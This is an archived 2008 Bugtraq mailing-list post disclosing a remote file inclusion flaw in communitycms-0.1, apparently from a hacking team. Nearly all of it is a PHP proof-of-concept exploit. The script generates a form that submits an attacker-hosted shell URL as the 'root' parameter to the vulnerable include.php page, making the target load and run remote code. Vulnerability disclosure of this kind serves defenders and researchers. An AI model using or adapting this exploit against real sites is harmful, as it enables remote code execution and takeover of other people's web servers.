[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080717154647.31298.qmail@securityfocus.com>
Date: 17 Jul 2008 15:46:47 -0000
From: n3tr00t3r@...oo.com
To: bugtraq@...urityfocus.com
Subject: communitycms-0.1 Remote File Includion
<?php
/************************************************** ********************
*[+] << IN THE NAME OF GOD >>
*[+]
*[+]
*[+] [ Persian Boys Hacking Team ] -:- 2008 -:- IRAN
*[+] -
*[+] - discovered by N3TR00T3R [at] Y! [dot] com
*[+] - communitycms-0.1 Remote File Includion
*[+] - download :http://sourceforge.net/project/showf...roup_id=223968
*[+] - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph 3r,shayan_cmd
*[+] r00t.master,Dr.root,Pouya_server,Spyn3t,LordKouros h,123qwe,mr.n4ser
*[+] Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
*[+]
************************************************** ********************/
#if register_globals = On;
$shell="http://localhost/syn99.php?"; // your shell
$target="http://localhost/communitycms/include.php"; //vul page ---> include.php
echo"<html>
<body>
<form action=$target method=POST>
SECURITY :<input type=text name=security>
SHELL :<input type=text name=root>
<input type=hidden name=security value=1>
<input type=hidden name=root value=$shell>
<input type=submit value=ok>
</form>
</body>
</html>";
?>
Powered by blists - more mailing lists